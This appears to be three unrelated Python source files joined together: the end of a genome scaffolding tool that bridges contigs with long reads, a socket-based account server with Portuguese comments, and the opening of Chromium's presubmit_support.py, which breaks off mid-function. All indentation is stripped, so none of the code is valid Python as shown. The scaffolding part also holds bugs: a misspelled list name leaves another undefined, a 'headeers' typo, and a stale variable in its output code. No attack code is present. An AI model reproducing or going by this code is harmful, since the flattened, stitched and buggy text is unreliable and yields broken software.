(length, numNodes, sname, ename, direction, pathstrand, SIavg) = calc_path_info(path)
connected_anodes[sname] = anchornodes[sname]
connected_anodes[ename] = anchornodes[ename]
# path_info_list contains info on all paths, putting it also in reverse order (endnode, startnode)
# So that I can use it to quickly determine best connections for each node in left and right direction
# Last element of the tuple (index 5) say if the info i in reverse order compared to the path
opposite_direction = direction
if pathstrand == '+':
opposite_direction = reverseDirection(direction)
path_info_list.append((sname, ename, length, numNodes, direction, pathstrand, SIavg, path))
path_info_list.append((ename, sname, length, numNodes, opposite_direction, pathstrand, SIavg, reversed_path(path)))
if len(path_info_list) == 0:
return path_info_groups, connected_anodes
# 2. Group the paths according to starting node, ending node and direction (path strand)
path_info_list.sort(key=lambda pathinfo: pathinfo[5]) # sort path_info_list first according to relative strand
path_info_list.sort(key=lambda pathinfo: pathinfo[1]) # sort path_info_list first according to end node
path_info_list.sort(key=lambda pathinfo: pathinfo[0]) # and then according to start node
(sname, ename, length, numNodes, direction, pathstrand, SIavg, path) = path_info_list[0] # Data for the first path
left_paths_plus = left_paaths_minus = right_paths_plus = right_paths_minus = []
if direction == directionLEFT:
if pathstrand == '+':
left_paths_plus.append((sname, ename, length, numNodes, direction, pathstrand, SIavg, path))
else:
left_paths_minus.append((sname, ename, length, numNodes, direction, pathstrand, SIavg, path))
else:
if pathstrand == '+':
right_paths_plus.append((sname, ename, length, numNodes, direction, pathstrand, SIavg, path))
else:
right_paths_minus.append((sname, ename, length, numNodes, direction, pathstrand, SIavg, path))
for (sname2, ename2, length2, numNodes2, direction2, pathstrand2, SIavg2, path2) in path_info_list[1:]:
# Start node, end node or path strand has changed, have to wrap up the path group and start a new one
if sname2 != sname or ename2 != ename or pathstrand2 != pathstrand:
if left_paths_plus:
path_info_groups.append(left_paths_plus)
elif left_paths_minus:
path_info_groups.append(left_paths_minus)
elif right_paths_plus:
path_info_groups.append(right_paths_plus)
elif right_paths_minus:
path_info_groups.append(right_paths_minus)
else:
sys.stderr.write('\nSCARA BRIDGER ERROR while processing paths: left and right groups are empty (%s)!' % sname)
left_paths_plus = []
left_paths_minus = []
right_paths_plus = []
right_paths_minus = []
sname = sname2 # Numnodes, pathlength, SIavg and path are not used for grouping
ename = ename2
pathstrand = pathstrand2
direction = direction2
if direction2 == directionLEFT:
if pathstrand2 == '+':
left_paths_plus.append((sname2, ename2, length2, numNodes2, direction2, pathstrand2, SIavg2, path2))
else:
left_paths_minus.append((sname2, ename2, length2, numNodes2, direction2, pathstrand2, SIavg2, path2))
else:
if pathstrand2 == '+':
right_paths_plus.append((sname2, ename2, length2, numNodes2, direction2, pathstrand2, SIavg2, path2))
else:
right_paths_minus.append((sname2, ename2, length2, numNodes2, direction2, pathstrand2, SIavg2, path2))
# At the end, add the last group to the group list
if left_paths_plus:
path_info_groups.append(left_paths_plus)
elif left_paths_minus:
path_info_groups.append(left_paths_minus)
elif right_paths_plus:
path_info_groups.append(right_paths_plus)
elif right_paths_minus:
path_info_groups.append(right_paths_minus)
else:
sys.stderr.write('\nSCARA BRIDGER ERROR while processing paths: left and right groups are empty (%s)!' % sname)
# import pdb
# pdb.set_trace()
return path_info_groups, connected_anodes
# A function that filters paths
# Each anchoring node can have at most one path extending it to the left and at most one path
# extending it to the right. Only the best paths are preserved
# pathinfo: (sname, ename, length, numNodes, direction. pathstrand, SIavg, path)
# NOTE: pgroup[0] represents the first path in the group, all paths in the group should have the same
# start node, end node and direction (depending on the strand)
def filter_path_groups(path_groups):
temp_groups = []
filtered_groups = []
discarded_groups = []
# KK: The comment below is not ocrrect, because when linking paths. in case path contigsa re on different strands
# the direction needs to be changed!
# 1. Since each path is entered twice, once for each direction, we can look only at path
# extending in one direction - in this case direction RIGHT
# for pgroup in path_groups:
# if pgroup[0][4] == directionRIGHT:
# temp_groups.append(pgroup)
# else:
# discarded_groups.append(pgroup)
# 1. Find all used anchor nodes
used_anodes = {}
for pgroup in path_groups:
sname = pgroup[0][0]
ename = pgroup[0][1]
used_anodes[sname] = 1
used_anodes[ename] = 1
# 2. Sort groups by group size, from larger to smaller
# For each combination of anchor nodes retain only the largest group
path_groups.sort(key=lambda group: len(group), reverse=True)
used_leftnodes = {} # Nodes for exension to the left
used_rightnodes = {} # Nodes used for extension to the right
for pgroup in path_groups:
# Following whould be the same for all paths in the group
sname = pgroup[0][0]
ename = pgroup[0][1]
direction = pgroup[0][4]
pathstrand = pgroup[0][5]
snodedict = enodedict = None
if direction == directionRIGHT: # Extending start node to the right
snodedict = used_rightnodes
if pathstrand == '+':
enodedict = used_leftnodes # If start and end nodes are on the same strand, end node is extended to the left
else:
enodedict = used_rightnodes # If start and end nodes are on different strands, end node is also extended to the right
else:
snodedict = used_leftnodes
if pathstrand == '+':
enodedict = used_rightnodes
else:
enodedict = used_leftnodes
if sname not in snodedict and ename not in enodedict:
filtered_groups.append(pgroup)
snodedict[sname] = 1
enodedict[ename] = 1
else:
discarded_groups.append(pgroup)
return filtered_groups, discarded_groups
# A function that for each path group determines a representative paths
# If a group contains only paths of similar length, the path with greatest average SI is chosen
# If path length varies a lot, then paths are split according to length into buckets of 1000 bases
# For the start, choosing a bucket with the most paths
# pathinfo: (sname, ename, length, numNodes, direction, SIavg, path)
def finalize_paths(filtered_groups, paths):
final_paths = []
STEP = 1000
for fgroup in filtered_groups:
buckets = []
bucket = []
fgroup.sort(key=lambda pathinfo: pathinfo[2]) # sort paths in a group according to length
minlength = fgroup[0][2]
bucket.append(fgroup[0])
for pathinfo in fgroup[1:]:
length = pathinfo[2]
if length > minlength + STEP:
buckets.append(bucket)
bucket = []
bucket.append(pathinfo)
minlength = length
else:
bucket.append(pathinfo)
buckets.append(bucket)
# Sort bucket according to size and choose a largest one
# Then chose a best representative path from the top bucket
buckets.sort(key=lambda bucket: len(bucket), reverse=True)
bucket = buckets[0]
bucket.sort(key=lambda pathinfo: pathinfo[6], reverse=True) # Sort according to SIavg
final_paths.append(bucket[0])
return final_paths
# Generate fasta from final paths and write them to a file if specified
# Contigs not used for scaffolds are written as is
# pathinfo: (sname, ename, length, numNodes, direction, pathstrand, SIavg, path)
def generate_fasta(final_paths, anchornodes, readnodes, filename = None):
# Calculate anchor nodes used for scaffolding
# Also add a list of anchor nodes used in each path for later use
used_nodes = {}
path_dict = {}
wrk_final_paths = []
for pathinfo in final_paths:
sname = pathinfo[0]
ename = pathinfo[1]
direction = pathinfo[4]
pathstrand = pathinfo[5]
lpathinfo = list(pathinfo)
lpathinfo.append([sname, ename])
wrk_final_paths.append(lpathinfo)
path_dict[sname] = pathinfo
if sname in used_nodes:
used_nodes[sname] += 1
else:
used_nodes[sname] = 1
if ename in used_nodes:
used_nodes[ename] += 1
else:
used_nodes[ename] = 1
# Combine linked paths
# Try joining paths together, end when no paths can be joined
while (True):
join = False
pinfo1 = pinfo2 = None # If two path will be joind, the will be stored in there variables
new_pinfo = None
combined_path = None
for pinfo1 in wrk_final_paths:
sname1 = pinfo1[0]
ename1 = pinfo1[1]
direction1 = pinfo1[4]
pathstrand1 = pinfo1[5]
path1 = pinfo1[7]
anodes1 = pinfo1[8]
for pinfo2 in wrk_final_paths:
sname2 = pinfo2[0]
ename2 = pinfo2[1]
direction2 = pinfo2[4]
pathstrand2 = pinfo2[5]
path2 = pinfo2[7]
anodes2 = pinfo2[8]
if pinfo1 != pinfo2:
# Extending path1 with path2
# pathinfo: (sname, ename, length, numNodes, direction, pathstrand, SIavg, path)
# At this point length and numNodes are irelevant
try:
if ename1 == sname2:
if (pathstrand1 == '+' and direction1 == direction2) or \
(pathstrand1 == '-' and direction1 != direction2):
new_pathstrand = '+' if pathstrand1 == pathstrand2 else '-'
combined_path = path1 + path2
new_pinfo = [sname1, ename2, 0, 0, direction1, new_pathstrand, 1.0, combined_path, anodes1 + [ename2]]
join = True
# Extending path2 with path1
elif ename2 == sname1:
if (pathstrand2 == '+' and direction2 == direction1) or \
(pathstrand2 == '-' and direction2 != direction1):
new_pathstrand = '+' if pathstrand1 == pathstrand2 else '-'
combined_path = path2 + path1
new_pinfo = [sname2, ename1, 0, 0, direction2, new_pathstrand, 1.0, combined_path, anodes2 + [ename1]]
join = True
# Extending with reversing paths
elif sname1 == sname2 and direction1 != direction2:
rpath1 = reversed_path(path1)
new_pathstrand = '+' if pathstrand1 == pathstrand2 else '-'
combined_path = rpath1 + path2
new_pinfo = [ename1, ename2, 0, 0, direction2, new_pathstrand, 1.0, combined_path, [ename1] + anodes2]
join = True
elif ename1 == ename2 and direction1 != direction2:
rpath2 = reversed_path(path2)
new_pathstrand = '+' if pathstrand1 == pathstrand2 else '-'
combined_path = path1 + rpath2
new_pinfo = [sname1, sname2, 0, 0, direction1, new_pathstrand, 1.0, combined_path, anodes1 + [sname2]]
join = True
except:
import pdb
pdb.set_trace()
pass
if join: # Exit the first loop if the join was done
break
if join: # Exit the second loop if the join was done
break
if join:
wrk_final_paths.remove(pinfo1)
wrk_final_paths.remove(pinfo2)
wrk_final_paths.append(new_pinfo)
else: # Finish if no paths were joined in this iteration
break
headers = []
seqs = []
# Generate headers and fasta sequences for each combined path
i = 1
for pinfo in wrk_final_paths:
path = pinfo[7]
anodes = pinfo[8]
header = 'Scaffold%04d %s' % (i, ','.join(anodes))
seq = generate_fasta_for_path(path, anchornodes, readnodes)
headers.append(header)
seqs.append(seq)
i += 1
# Add unused anchor nodes to the output
for aname, anode in anchornodes.iteritems():
if aname not in used_nodes:
header = '%s' % aname
seq = anode.seq
headers.append(header)
seqs.append(seq)
# Testing if the generation is correct
if len(headers) != len(seqs):
sys.stderr.write('\nSCARA BRIDGER ERROR: generating headers (%d) and sequences (%d)!' % (len(headeers), len(seqs)))
# Writting output to a file
if filename is not None:
file = open(filename, 'w')
for i in xrange(len(headers)):
header = headers[i]
seq = seqs[i]
file.write('>%s\n%s\n' % (header, seq))
file.close()
return headers, seqs
def start_bridger(contigs_file, reads_file, cr_overlaps_file, rr_overlaps_file, paramdict, output=True):
load_global_parameters(paramdict)
reads_to_discard = {}
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Starting ...' % datetime.now().time().isoformat())
### Creating a graph
# 1. Adding contigs as anchor nodes
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Loading contigs ...' % datetime.now().time().isoformat())
anchornodes = load_anchornodes(contigs_file)
# 2. Adding reads as read nodes
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Loading reads ...' % datetime.now().time().isoformat())
readnodes = load_readnodes(reads_file, output = False)
# 3. processing overlaps between contigs and reads
# NOTE: for the overlaps file, we can not be sure whether query or target
# corresponds to reads or overlaps
# NOTE: OVERLAPS NEED TO BE FITLERED!
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Loading contig/read overlaps ...' % datetime.now().time().isoformat())
crovledges, isolated_anodes = load_cr_overlaps(cr_overlaps_file, anchornodes, readnodes, reads_to_discard)
if output:
sys.stdout.write('\nSCARA BRIDGER: %d anchor nodes are isolated!' % len(isolated_anodes))
# 4. processing overlaps between reads
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Loading read/read overlaps ...' % datetime.now().time().isoformat())
numthreads = 1
if '-t' in paramdict:
numthreads = int(paramdict['-t'][0])
if '--threads' in paramdict:
numthreads = int(paramdict['--threads'][0])
if numthreads == 1:
rrovledges = load_rr_overlaps_ST(rr_overlaps_file, readnodes, reads_to_discard)
else:
rrovledges = load_rr_overlaps_MT(rr_overlaps_file, readnodes, reads_to_discard, numthreads)
if output:
sys.stdout.write('\nSCARA BRIDGER before cleanup: ANODES: %d, RNODES: %d, CROVL: %d, RROVL: %d' % (len(anchornodes), len(readnodes), len(crovledges), len(rrovledges)))
### Cleaning up the graph
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Cleaning up the graph ...' % datetime.now().time().isoformat())
edgesRemoved = graph_cleanup(anchornodes, readnodes, crovledges, rrovledges, reads_to_discard)
if output:
sys.stdout.write('\nSCARA BRIDGER cleanup removed %d edges/overlaps:' % edgesRemoved)
sys.stdout.write('\nSCARA BRIDGER after cleanup: ANODES: %d, RNODES: %d, CROVL: %d, RROVL: %d' % (len(anchornodes), len(readnodes), len(crovledges), len(rrovledges)))
# import pdb
# pdb.set_trace()
### Calculating paths through the graph
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Calculating paths ...' % datetime.now().time().isoformat())
# 1. Approach
# For every anchor node consider all connecting read nodes
# For further extension consider only the read with the highest OVERLAP score
paths1 = getPaths_maxovl(anchornodes, readnodes, crovledges, rrovledges)
if output:
sys.stdout.write('\nSCARA BRIDGER: Approach 1 returned %d paths!\n' % len(paths1))
# 2. Approach
# For every anchor node consider all connecting read nodes
# For further extension consider only the read with the highest EXTENSION score
paths2 = getPaths_maxext(anchornodes, readnodes, crovledges, rrovledges)
if output:
sys.stdout.write('\nSCARA BRIDGER: Approach 2 returned %d paths!\n' % len(paths2))
# 3. Approach
# Monte Carlo method - randomly select reads for each extension
# probability of selecting a read is proportional to extension score
# This approach must generate more paths then first two approaches combined
numMCpaths = 2*(len(paths1) + len(paths2) + 1)
if numMCpaths < MinMCPaths:
numMCpaths = MinMCPaths
paths3 = getPaths_MC(anchornodes, readnodes, crovledges, rrovledges, numMCpaths)
if output:
sys.stdout.write('\nSCARA BRIDGER: Approach 3 returned %d paths!\n' % len(paths3))
paths = paths1 + paths2 + paths3
# Sanity check: checking eash path for consistency
sys.stdout.write('\nSCARA BRIDGER: Checking paths for consistency: ')
inconsitent_paths = 0
for path in paths:
if not check_path_consistency(path):
inconsitent_paths += 1
if inconsitent_paths > 0:
sys.stdout.write('%d paths are inconsistent!' % inconsitent_paths)
else:
sys.stdout.write('All paths are consistent!')
if '--print-graph' in paramdict:
sys.stdout.write('\nSCARA BRIDGER: Printing generated paths to %s' % 'graph.txt')
fgraph = open('graph.txt', 'w')
# Printing summary information
fgraph.write('SUMMARY:\n')
fgraph.write('SNODE, ENODE, NUMNODES, LENGTH, DIRECTION, SIAVG\n')
for path in paths:
(length, numNodes, sname, ename, sdirection, edirection, SIavg) = calc_path_info(path)
sdirection = 'LEFT' if direction == directionLEFT else 'RIGHT'
fgraph.write('%s, %s, %d, %d, %s, %f\n' % (sname, ename, numNodes, length, sdirection, SIavg))
# Printing detailed information (All nodes)
fgraph.write('\nDETAILS:\n')
for path in paths:
(length, numNodes, sname, ename, sdirection, edirection, SIavg) = calc_path_info(path)
fgraph.write('PATH %s - %s\n' % (sname, ename))
fgraph.write('%s' % path[0].startNode.name)
for edge in path:
fgraph.write(', %s' % edge.endNode.name)
fgraph.write('\n')
fgraph.close()
# Checking paths for duplicate reads
invalid_paths = False
if '--check-paths' in paramdict:
for path in paths:
invalid = check_path(path)
if invalid == True:
invalid_paths = True
if invalid_paths == True:
sys.stdout.write("\nSCARA BRIDGER: Invalid paths found!")
else :
sys.stdout.write("\nSCARA BRIDGER: All paths are valid!")
### Processing generated paths
if output:
sys.stdout.write('\n[%s]SCARA BRIDGER: Processing paths ...' % datetime.now().time().isoformat())
sys.stdout.write('\nSCARA BRIDGER: Grouping paths ...\n')
if len(paths) == 0:
sys.stdout.write('\nSCARA BRIDGER WARNING: No paths generated! Unable to proceed. Quiting ...\n')
return
path_info_groups, connected_anodes = group_paths(paths, anchornodes)
# Determine initial connected nodes
for aname, anode in anchornodes.iteritems():
if aname not in connected_anodes:
isolated_anodes[aname] = anode
if output:
sys.stdout.write('\nSCARA BRIDGER: Isolated anchor nodes (%d) : ' % len(isolated_anodes))
# for aname in sorted(isolated_anodes.keys()):
# sys.stdout.write(' %s,' % aname)
sys.stdout.write('\nSCARA BRIDGER: Connected anchor nodes (%d) : ' % len(connected_anodes))
# for aname in sorted(connected_anodes):
# sys.stdout.write(' %s,' % aname)
if output:
sys.stdout.write('\n\nSCARA BRIDGER: Path group info: SNODE, ENODE, DIRECTION, STRAND, NUMPATHS')
for pinfo_group in path_info_groups:
(sname, ename, length, numNodes, direction, pathstrand, SIavg, path) = pinfo_group[0]
strSdirection = 'LEFT' if direction == directionLEFT else 'RIGHT'
sys.stdout.write('\nSCARA BRIDGER: %s %s %s %s %d' % (sname, ename, strSdirection, pathstrand, len(pinfo_group)))
# import pdb
# pdb.set_trace()
if output:
sys.stdout.write('\n\nSCARA BRIDGER: Filtering path groups ...\n')
filtered_groups, discarded_groups = filter_path_groups(path_info_groups)
if output:
sys.stdout.write('\nSCARA BRIDGER: Discarded groups: SNODE, ENODE, DIRECTION, STRAND, NUMPATHS')
for pinfo_group in discarded_groups:
(sname, ename, length, numNodes, direction, pathstrand, SIavg, path) = pinfo_group[0]
strSdirection = 'LEFT' if direction == directionLEFT else 'RIGHT'
sys.stdout.write('\nSCARA BRIDGER: %s %s %s %s %d' % (sname, ename, strSdirection, pathstrand, len(pinfo_group)))
sys.stdout.write('\n\nSCARA BRIDGER: Remaining groups: SNODE, ENODE, DIRECTION, STRAND, NUMPATHS')
for pinfo_group in filtered_groups:
(sname, ename, length, numNodes, direction, pathstrand, SIavg, path) = pinfo_group[0]
strSdirection = 'LEFT' if direction == directionLEFT else 'RIGHT'
sys.stdout.write('\nSCARA BRIDGER: %s %s %s %s %d' % (sname, ename, strSdirection, pathstrand, len(pinfo_group)))
if output:
sys.stdout.write('\n\nSCARA BRIDGER: Final path filtering ...\n')
final_paths = finalize_paths(filtered_groups, paths)
# pathinfo: (sname, ename, length, numNodes, direction, pathstrand, SIavg, path)
longpaths = 0
if output:
sys.stdout.write('\nSCARA BRIDGER FINAL PATHS: SNODE, ENODE, LENGTH, NUMNODES, DIRECTION, STRAND, SIAVG')
for (sname, ename, length, numNodes, direction, pathstrand, SIavg, path) in final_paths:
strSdirection = 'LEFT' if direction == directionLEFT else 'RIGHT'
sys.stdout.write('\nSCARA BRIDGER: %s %s %d %d %s %s %f' % (sname, ename, length, numNodes, strSdirection, pathstrand, SIavg))
if numNodes > SoftNodeLimit:
longpaths += 1
if longpaths > 0:
sys.stdout.write('\nWARNING: Final paths contain %d paths longer than %d nodes!' % (longpaths, SoftNodeLimit))
sys.stdout.write('\nYou should consider modifying global parameters!')
if output:
sys.stdout.write('\n\n[%s]SCARA BRIDGER: Generating FASTA ...' % datetime.now().time().isoformat())
out_filename = 'scaffolds.fasta'
if '-o' in paramdict:
out_filename = paramdict['-o'][0]
elif '--output' in paramdict:
out_filename = paramdict['--output'][0]
headers, seqs = generate_fasta(final_paths, anchornodes, readnodes, filename = out_filename)
if output:
sys.stdout.write('\nSCARA BRIDGER: FASTA sequences generated: %d\n' % len(headers))
# for header in headers:
# sys.stdout.write('\n%s' % header)
# import pdb
# pdb.set_trace()
sys.stderr.write('\n\n[%s]SCAFFOLDIND with SCARA BRIDGER DONE!\n' % datetime.now().time().isoformat())
def load_fast(reads_file, output = True):
filename, file_extension = os.path.splitext(reads_file)
ftype = ''
if file_extension.upper() in ('.FA', '.FNA', '.FASTA'):
ftype = 'FASTA'
elif file_extension.upper() in ('.FQ', '.FASTQ'):
ftype = 'FASTQ'
else:
sys.stderr.write('\nERROR: Invalid file extension: %s' % reads_file)
return
[headers, seqs, quals] = read_fastq(reads_file)
if output == True:
sys.stdout.write('\n%s | File type: %s' % (reads_file, ftype))
sys.stdout.write('\nNumber of enteries: %d\n' % len(seqs))
for i in xrange(len(headers)):
sys.stdout.write('contig: %s, length: %d\n' % (headers[i], len(seqs[i])))
return [headers, seqs, quals]
def load_paf(paf_file, output = True):
filename, file_extension = os.path.splitext(paf_file)
ftype = ''
if file_extension.upper() in ('.PAF'):
ftype = 'PAF'
else:
sys.stderr.write('\nERROR: Invalid file extension: %s' % paf_file)
return
paf_lines = PAFutils.load_paf(paf_file)
if output == True:
sys.stdout.write('\n%s | File type: %s' % (paf_file, ftype))
sys.stdout.write('\nNumber of enteries: %d\n' % len(paf_lines))
return paf_lines
def verbose_usage_and_exit():
sys.stderr.write('bridger - a scaffolding tool that bridges gaps between contigs using long reads.\n')
sys.stderr.write('\n')
sys.stderr.write('Usage:\n')
sys.stderr.write('\t%s [mode]\n' % sys.argv[0])
sys.stderr.write('\n')
sys.stderr.write('\tmode:\n')
sys.stderr.write('\t\tscaffold\n')
sys.stderr.write('\t\tload_fast\n')
sys.stderr.write('\t\tload_paf\n')
sys.stderr.write('\t\tload_sam\n')
sys.stderr.write('\n')
exit(0)
if __name__ == '__main__':
if (len(sys.argv) < 2):
verbose_usage_and_exit()
mode = sys.argv[1]
if (mode == 'scaffold'):
if (len(sys.argv) < 6):
sys.stderr.write('Scaffold given contigs with given reads and their overlaps.\n')
sys.stderr.write('Usage:\n')
sys.stderr.write('%s %s <contigs FASTA> <reads FASTA> <reads-contigs overlaps PAF/SAM> <reads-reads overlaps PAF/SAM options\n' % (sys.argv[0], sys.argv[1]))
sys.stderr.write('options:"\n')
sys.stderr.write('-o (--output) <file> : output file to which the report will be written\n')
sys.stderr.write('\n')
exit(1)
contigs_file = sys.argv[2]
reads_file = sys.argv[3]
cr_overlaps_file = sys.argv[4]
rr_overlaps_file = sys.argv[5]
pparser = paramsparser.Parser(paramdefs)
paramdict = pparser.parseCmdArgs(sys.argv[6:])
paramdict['command'] = ' '.join(sys.argv)
start_bridger(contigs_file, reads_file, cr_overlaps_file, rr_overlaps_file, paramdict)
elif (mode == 'load_fast'):
if (len(sys.argv) != 3):
sys.stderr.write('Load FASTA / FASTQ file with reads.\n')
sys.stderr.write('Usage:\n')
sys.stderr.write('%s %s <reads FASTA>\n' % (sys.argv[0], sys.argv[1]))
sys.stderr.write('\n')
exit(1)
reads_file = sys.argv[2]
load_fast(reads_file)
elif (mode == 'load_paf'):
if (len(sys.argv) != 3):
sys.stderr.write('Load PAF file with overlaps.\n')
sys.stderr.write('Usage:\n')
sys.stderr.write('%s %s <overlaps PAF>\n' % (sys.argv[0], sys.argv[1]))
sys.stderr.write('\n')
exit(1)
overlaps_file = sys.argv[2]
load_paf(overlaps_file)
elif (mode == 'load_sam'):
if (len(sys.argv) != 3):
sys.stderr.write('Load SAM file with overlaps.\n')
sys.stderr.write('Usage:\n')
sys.stderr.write('%s %s <overlaps SAM>\n' % (sys.argv[0], sys.argv[1]))
sys.stderr.write('\n')
exit(1)
overlaps_file = sys.argv[2]
load_sam(overlaps_file)
else:
print 'Invalid mode!'
|
server.py
|
import socket
import select
import threading
import json
import sys
import os
from processLayer import ProcessLayer
class Server:
def __init__(self, host = '', port = 5000, pending_conn = 5, blocking = True):
self.SERVER_IS_ALIVE = True #Flag de controle
self.host = host #'' possibilita acessar qualquer endereco alcancavel da maquina local
self.port = port #Porta utilizada pelo processo para ouvir as mensagens
self.blocking = blocking #Define se o socket será bloqueante ou não-bloqueante
self.inputs = [sys.stdin]
self.connections = {} #Armazena histórico de conexões
self.workers = [] #Armazena as threads criadas.
self.pending_conn = pending_conn #Número de conexões que o servidor espera
self.processLayer = ProcessLayer() #Inicializa a classe responsável pela camada de processamento
self.processLayer.readUsers() #Lê os dados do usuário
self.start()
def start(self):
"""
Cria o socket do servidor e o coloca a postos para aceitar conexões com os clientes.
"""
self.sock = socket.socket() #Cria um socket para a comunicação
self.sock.bind((self.host, self.port)) #Vincula a interface e porta para comunicação
self.sock.listen(self.pending_conn) #Coloca o processo em modo de espera pela a conexão. O argumento define o limite máximo de conexões pendentes
self.sock.setblocking(self.blocking) #Configura o sock para o modo não-bloqueante
self.inputs.append(self.sock) #Inclui o socket principal na lista de entradas de interesse
def acceptConnection(self):
"""
Método por aceitar novas conexões com os clientes
:return retorna o novo socket e a tupla (ip,port)
"""
newSock, ipAddress = self.sock.accept() #Aceita a primeira conexão da fila e retorna um novo socket e o endereço do par ao qual se conectou.
print ('Conectado com: ', ipAddress,'\n')
return newSock, ipAddress
def handleRequest(self, clientSock, ipAddress):
"""
Lida com a requisição feita pelo cliente, retornando o resultado do processamento do comando pedido por ele.
:param clientSock: socket associado ao cliente em questão.
:param ipAddress: endereço IP e porta do cliente em questão.
:return mensagem de resposta resultado do processamento do comando.
"""
while True:
request_msg = clientSock.recv(1024) #Recebe a mensagem do cliente
print(f'Mensagem recebida de {ipAddress}!')
if(request_msg == b''):
break
#Tranformar a mensagem recebida em um dicionário
request = json.loads(request_msg)
if(request['method'] == 'logout'):
response = self.processLayer.logoutClient(request['data']['userName'], request['data']['password'])
elif(request['method'] == 'createAccount'):
response = self.processLayer.createClientAccount(request['data']['userName'], request['data']['password'])
elif(request['method'] == 'deleteAccount'):
response = self.processLayer.deleteClientAccount(request['data']['userName'], request['data']['password'])
elif(request['method'] == 'authAccount'):
response = self.processLayer.authClientAccount(request['data']['userName'], request['data']['password'], (ipAddress[0], request['data']['port']))
elif(request['method'] == 'getMyStatus'):
response = self.processLayer.getClientStatus(request['data']['userName'], request['data']['password'])
elif(request['method'] == 'setMyStatus'):
response = self.processLayer.setClientStatus(request['data']['userName'], request['data']['password'], request['data']['status'])
elif(request['method'] == 'getUsers'):
response = self.processLayer.getUsersList()
else:
response = self.processLayer.methodNotFound(request['method'])
response_msg = json.dumps(response, ensure_ascii=False) #Gera o json para o envio da resposta ao cliente
clientSock.send(bytes(response_msg, encoding='utf-8')) #Envia mensagem de resposta para o cliente
print(f'Mensagem devolvida para {ipAddress}!\n')
def stop(self):
"""
Método responsável por matar o servidor
"""
self.processLayer.saveUsers()
self.sock.close()
self.SERVER_IS_ALIVE = False
for item in self.connections:
item.close()
print('Servidor finalizado!')
sys.exit(1)
def run(self):
"""
Método responsável por receber novas conexões e aceita comandos especiais do gerente do servidor
"""
print('Iniciando o servidor...')
print('Servidor está pronto para receber conexões.')
while (self.SERVER_IS_ALIVE) :
try:
#Espera por qualquer entrada de interesse
read, write, exception = select.select(self.inputs, [], [])
for trigger in read:
if trigger == self.sock: #Caso o trigger seja um nova conexão
clientSock, ipAddress = self.acceptConnection()
self.connections[clientSock] = ipAddress #Guarda a nova conexão
worker = threading.Thread(target=self.handleRequest, args=(clientSock,ipAddress))
worker.start()
self.workers.append(worker)
elif trigger == sys.stdin:
cmd = input().lower()
#Finaliza o servidor elegantemente
if (cmd == 'fim'):
if(threading.active_count() - 1 != 0):
print('\nExistem conexões abertas com clientes.')
print('Novas conexões não serão aceitas.')
print('Aguardando a finalização dos clientes existentes...')
for c in self.workers: #Aguarda todos os processos terminarem
c.join()
print('Todos os clientes terminaram de usar o servidor.')
self.stop()
#Mostra histórico de conexões
elif (cmd == 'hist'):
print('\nHistórico de conexões:', list(self.connections.values()))
#Mostra o número de threads clientes ativas
elif (cmd == 'ativos'):
print(f'\nExistem {threading.active_count() - 1} clientes ativos.')
#Finaliza o servidor de modo abrupto/não elegante
elif (cmd == 'kill'):
for key,value in self.processLayer.users.items():
self.processLayer.users[key].setStatus(-1)
self.processLayer.users[key].setIP('')
self.processLayer.users[key].setPort(0)
self.stop()
else:
print("\nComando não existe.")
except Exception as e:
print(e)
self.stop()
if __name__ == '__main__':
server = Server(host = '', port = 5000, pending_conn = 10, blocking = False)
server.run()
|
presubmit_support.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '2.0.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import argparse
import ast # Exposed through the API.
import contextlib
import cpplint
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import multiprocessing
import os # Somewhat exposed through the API.
import random
import re # Exposed through the API.
import signal
import six
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback
import unittest # Exposed through the API.
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners as owners_db
import owners_client
import owners_finder
import presubmit_canned_checks
import rdb_wrapper
import scm
import subprocess2 as subprocess # Exposed through the API.
if sys.version_info.major == 2:
# TODO(1009814): Expose urllib2 only through urllib_request and urllib_error
import urllib2 # Exposed through the API.
import urlparse
import urllib2 as urllib_request
import urllib2 as urllib_error
else:
import urllib.parse as urlparse
import urllib.request as urllib_request
import urllib.error as urllib_error
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
def time_time():
# Use this so that it can be mocked in tests without interfering with python
# system machinery.
return time.time()
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message, python3=False):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs.copy()
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
self.python3 = python3
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate().
class SigintHandler(object):
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
self.__previous_signal = signal.signal(signal.SIGINT, self.interrupt)
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self, signal_num, frame):
with self.__lock:
self.__on_sigint()
self.__previous_signal(signal_num, frame)
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
